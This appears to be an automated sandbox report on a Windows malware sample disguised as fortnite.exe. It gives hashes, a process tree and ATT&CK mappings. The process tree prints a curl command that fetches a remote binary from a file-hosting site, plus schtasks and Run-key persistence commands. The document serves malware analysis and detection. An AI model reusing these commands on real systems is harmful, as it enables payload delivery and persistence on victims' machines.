Analysis
-
max time kernel
151s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
17-11-2024 15:41
Static task
static1
Behavioral task
behavioral1
Sample
fortnite.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
fortnite.exe
Resource
win10v2004-20241007-en
General
-
Target
fortnite.exe
-
Size
1.4MB
-
MD5
fe46f964b97f65038b33d792041d5ae1
-
SHA1
78c5f038a61bd6cc176aa6ba404ce3b1066dd3ac
-
SHA256
5b1344b5474239635dbccf34f061111a440fdf309fc106ab7890902452d9e1f3
-
SHA512
8f630383500a97b11174b39206bc63732c67e9ee58430f64efa708565ed9a01b737e133639f0a56f936fc9d13f0e234e655c1f2f9c3683931e8c1fa11a507d0f
-
SSDEEP
24576:PFOaIhahEyuRAmfnkuGKFDflpC+bKlAtc06cd:tUhfnsGzH
Malware Config
Signatures
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" svchost.exe -
Executes dropped EXE 6 IoCs
pid Process 1284 fortnite.exe 1796 icsys.icn.exe 2124 explorer.exe 1192 spoolsv.exe 2936 svchost.exe 2220 spoolsv.exe -
Loads dropped DLL 7 IoCs
pid Process 2044 fortnite.exe 2044 fortnite.exe 1560 Process not Found 1796 icsys.icn.exe 2124 explorer.exe 1192 spoolsv.exe 2936 svchost.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" svchost.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\explorer.exe svchost.exe File opened for modification C:\Windows\SysWOW64\explorer.exe explorer.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification \??\c:\windows\resources\themes\explorer.exe icsys.icn.exe File opened for modification \??\c:\windows\resources\spoolsv.exe explorer.exe File opened for modification \??\c:\windows\resources\svchost.exe spoolsv.exe File opened for modification C:\Windows\Resources\tjud.exe explorer.exe File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe fortnite.exe -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icsys.icn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fortnite.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2844 schtasks.exe 2540 schtasks.exe 3008 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 2044 fortnite.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2124 explorer.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe 2936 svchost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2124 explorer.exe 2936 svchost.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2044 fortnite.exe 2044 fortnite.exe 1796 icsys.icn.exe 1796 icsys.icn.exe 2124 explorer.exe 2124 explorer.exe 1192 spoolsv.exe 1192 spoolsv.exe 2936 svchost.exe 2936 svchost.exe 2220 spoolsv.exe 2220 spoolsv.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 2044 wrote to memory of 1284 2044 fortnite.exe 30 PID 2044 wrote to memory of 1284 2044 fortnite.exe 30 PID 2044 wrote to memory of 1284 2044 fortnite.exe 30 PID 2044 wrote to memory of 1284 2044 fortnite.exe 30 PID 2044 wrote to memory of 1796 2044 fortnite.exe 31 PID 2044 wrote to memory of 1796 2044 fortnite.exe 31 PID 2044 wrote to memory of 1796 2044 fortnite.exe 31 PID 2044 wrote to memory of 1796 2044 fortnite.exe 31 PID 1796 wrote to memory of 2124 1796 icsys.icn.exe 33 PID 1796 wrote to memory of 2124 1796 icsys.icn.exe 33 PID 1796 wrote to memory of 2124 1796 icsys.icn.exe 33 PID 1796 wrote to memory of 2124 1796 icsys.icn.exe 33 PID 2124 wrote to memory of 1192 2124 explorer.exe 34 PID 2124 wrote to memory of 1192 2124 explorer.exe 34 PID 2124 wrote to memory of 1192 2124 explorer.exe 34 PID 2124 wrote to memory of 1192 2124 explorer.exe 34 PID 1284 wrote to memory of 2916 1284 fortnite.exe 35 PID 1284 wrote to memory of 2916 1284 fortnite.exe 35 PID 1284 wrote to memory of 2916 1284 fortnite.exe 35 PID 1284 wrote to memory of 2920 1284 fortnite.exe 36 PID 1284 wrote to memory of 2920 1284 fortnite.exe 36 PID 1284 wrote to memory of 2920 1284 fortnite.exe 36 PID 1192 wrote to memory of 2936 1192 spoolsv.exe 37 PID 1192 wrote to memory of 2936 1192 spoolsv.exe 37 PID 1192 wrote to memory of 2936 1192 spoolsv.exe 37 PID 1192 wrote to memory of 2936 1192 spoolsv.exe 37 PID 2936 wrote to memory of 2220 2936 svchost.exe 38 PID 2936 wrote to memory of 2220 2936 svchost.exe 38 PID 2936 wrote to memory of 2220 2936 svchost.exe 38 PID 2936 wrote to memory of 2220 2936 svchost.exe 38 PID 2124 wrote to memory of 2740 2124 explorer.exe 39 PID 2124 wrote to memory of 2740 2124 explorer.exe 39 PID 2124 wrote to memory of 2740 2124 explorer.exe 39 PID 2124 wrote to memory of 2740 2124 explorer.exe 39 PID 2936 wrote to memory of 2844 2936 svchost.exe 40 PID 2936 wrote to memory of 2844 2936 svchost.exe 40 PID 2936 wrote to memory of 2844 2936 svchost.exe 40 PID 2936 wrote to memory of 2844 2936 svchost.exe 40 PID 2936 wrote to memory of 2540 2936 svchost.exe 44 PID 2936 wrote to memory of 2540 2936 svchost.exe 44 PID 2936 wrote to memory of 2540 2936 svchost.exe 44 PID 2936 wrote to memory of 2540 2936 svchost.exe 44 PID 2936 wrote to memory of 3008 2936 svchost.exe 46 PID 2936 wrote to memory of 3008 2936 svchost.exe 46 PID 2936 wrote to memory of 3008 2936 svchost.exe 46 PID 2936 wrote to memory of 3008 2936 svchost.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\fortnite.exe"C:\Users\Admin\AppData\Local\Temp\fortnite.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2044 -
\??\c:\users\admin\appdata\local\temp\fortnite.exec:\users\admin\appdata\local\temp\fortnite.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe3⤵PID:2916
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:2920
-
-
-
C:\Windows\Resources\Themes\icsys.icn.exeC:\Windows\Resources\Themes\icsys.icn.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1796 -
\??\c:\windows\resources\themes\explorer.exec:\windows\resources\themes\explorer.exe3⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2124 -
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe SE4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1192 -
\??\c:\windows\resources\svchost.exec:\windows\resources\svchost.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2936 -
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe PR6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 15:44 /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 15:45 /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 15:46 /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3008
-
-
-
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe4⤵PID:2740
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
135KB
MD5a711f0925f42a810499b8963f248f81d
SHA1e2d108438a52befe6ff8c76f830373224276ebd0
SHA256ca0c9438d7e0bb0abe5cd9ea49028d9bf53de2394d63991a036448eec36adcc7
SHA512fc374f708ae6cb6fb558fcbcca9a30e3e0d4764f77cb3208a553815b063c762ab97d9f1aa2eafe5cdad36f04a3d086bce2d58767ff52b5b44c13775f7ee42634
-
Filesize
1.2MB
MD53287792eb50754ea8b3639bca36a8a99
SHA1d46b073edbbfcd8027d2df2b1ccb93f90bec3319
SHA2569c3dd5e7ce8aa6114c6d881a64eefb47f5e6557bbc84cbfa705318674b43fecc
SHA512fada9632e159e6225997c8c6d67fb09f4ce48c1c444d0205ceb8a4004f7006eb7c55ce2823d1f33672bbea36d29e6111cd5021b63ee2fbd3f6dbf2847ce78b38
-
Filesize
135KB
MD5db2a3be4d0ba7fbe7984689f57969053
SHA122eeabb26614ba2a32b0869ae544c67c02f9262b
SHA2562055a054d6084815d3e23fdc1cfa776bea0cf21a2eb6194a0d453eec3dead956
SHA5127b3cab337dfe217824ad754c02561f2bdb82eb92d3462503212870e4adb2f6b1e10392e3dc127883a3ef8c39e1c0d9ed946609831c114cc42746fa0f680390d4
-
Filesize
135KB
MD549af1e57561db06cf5460d2bd4bfac27
SHA106fd729a5828e737607618caac0b88c820f304cf
SHA256fa61bb735e38be8e69149c644c92a270dd5f805bbf2cf07db57fa090845be4bb
SHA51278c57b3c3410c37d998ea37a8c624d4b6e64f646f6e2aa63cbcc947b9a654411dc20e29109cca8e95e5d8ca75966bfd962ed160fcb16a583fc7e5b62439d7385
-
Filesize
135KB
MD5a74cc12915ee1a4baee804ef46526b9e
SHA1ac979475cda92036255b5dae36fef12bda2e7539
SHA2561b249b1b4494cb278cc37dde36799a89898650455493a31457aa4538fcfe5945
SHA512896322b4cbfb52e445ff3e7341dd19e70706bf6826b4425120911dae3898572a8ac295067afecc1d87006a5c07153640ef4f106167c90d470b3755fb3acfd1a7